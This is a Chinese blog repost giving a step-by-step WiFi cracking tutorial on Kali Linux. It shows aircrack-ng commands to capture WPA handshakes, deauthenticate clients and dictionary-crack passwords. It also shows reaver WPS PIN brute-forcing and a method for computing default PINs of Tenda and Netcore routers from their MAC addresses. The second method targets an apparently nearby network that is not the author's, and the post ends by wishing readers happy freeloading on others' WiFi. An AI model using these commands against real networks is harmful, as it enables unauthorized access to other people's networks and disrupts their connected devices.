• 详解WIFI破解-Kali篇


                  转自: http://www.secbox.cn/hacker/wireless/4877.html

    工具:

    1:笔记本

    2:USB无线网卡(必备)

    3:kali系统

    4:靠谱字典

    第一种方法:

    暴力破解法

    何为暴力破解呢,其实就是一个一个密码试,直到正确的密码为止。

    现在的wifi一般加密都是:

    1、不启用安全‍‍‍‍2、WEP‍‍‍‍

    3、WPA/WPA2-PSK(预共享密钥)‍‍‍‍

    4、WPA/WPA2 802.1X (radius认证)

    进入正题:

    第一步:

    进入kali启动终端输入如下:

    root@kali:~# airmon-ng

    看看网卡信息

    第二步:

    输入:

    airmon-ng start wlan0

    监听窗口

    第三步:

    输入:

    airodump-ng mon0

    扫描wifi信号

    这里我用自己家wifi做实验

    第四步:

    这是我家wifi:

    上图可以看出

    BSSID是 00:0F:32:A0:99:DC     信道(CH)是:1 

    输入:

    airodump-ng -w freedom -c CH --bssid 00:0F:32:A0:99:DC mon0 --ignore-negative-one

    解释:CH表示信道,信道是多少就填多少,freedom是一会抓握手包的文件名字,他会自动生成一个freedom.cap的文件,这个名字随便你们填什么

    00:0F:32:A0:99:DC  64:5A:04:BB:54:57   -4    0e- 0e     0      400  

    00:0F:32:A0:99:DC 这个是路由器的mac

    64:5A:04:BB:54:57 这个是客户端的mac

    第五步:

    重新开一个客户端输入命令:

    aireplay-ng --deaut 10 -a 00:0F:32:A0:99:DC -c 64:5A:04:BB:54:57 mon0 --ignore-negative-one

    掉线了,当我们重新连接抓到握手包

    第六步:

    破解握手包:

    命令如下:

    aircrack-ng -w mi freedom-*.cap

    解释:mi字典名字      freedom-*.cap

    abc123abc这个就是我的wifi密码

    破解完成,成功与否靠强大的字典和运气了,希望各位亲们蹭网愉快!!!

    第二种:通过pin码破解

    这个方法很简单:

    第一步:Wash 扫描开启WPS的网络。

    wash -i mon1 –C

    小编的周围没有开启wps功能我wifi,就会出现上图那样,这样咋办呢

    不要急,因为有些隐藏了起来,我们直接霸王硬上弓

    用前面那个扫wifi的命令:

    airodump-ng mon0

    看见小编圈起来的mac没有,选择一个PWR的值的绝对值小于70的wifi破解

    第二步:

    我在这选择的是名字为: FAST_F70E的wifi

    就他了:E4:D3:32:7F:F7:0E  -45        2        0    0   6  54e. WPA2 CCMP   PSK  FAST_F70E

    然后命令如下:

    reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv

    E4:D3:32:7F:F7:0E 这个mac根据路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E

    如图上表示可以破解,开启了wps功能

    出现上图这样,就表示不能破解换其他wifi破解吧孩子

    这样就表示破解出来了

    小知识:

    如果密码被改了你知道他wifi的pin码就用如下命令:reaver-i mon0 -b MAC -p PIN

    pin码有8位:所以就是10的8次方,要穷举1000000000次

    这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的。

    有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值。

    比如这个:bssid :Tenda_579A18    mac :C8:3A:35:57:9A:18  通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!

    破解时推荐这个命令:

    reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv

    因为 –d9 –t9参数 可以防止pin死路由器。

  • 相关阅读:
    QPS计算
    Burp学院-信息泄露
    Burp学院-OS命令注入
    Burp学院-SQL注入
    时间格式转换 日期转换
    K8s 1.20x版本nfs动态存储报错 persistentvolume-controller waiting for a volume to be created, either by external provisioner "qgg-nfs-storage" or manually created by system administrator
    K8Snode的自定义状态信息
    kubernetes之node资源紧缺时pod驱逐机制
    K8Snode最大pod数量
    阿里云域名白名单访问限制
  • 原文地址:https://www.cnblogs.com/askDing/p/6273400.html
Copyright © 2020-2023  润新知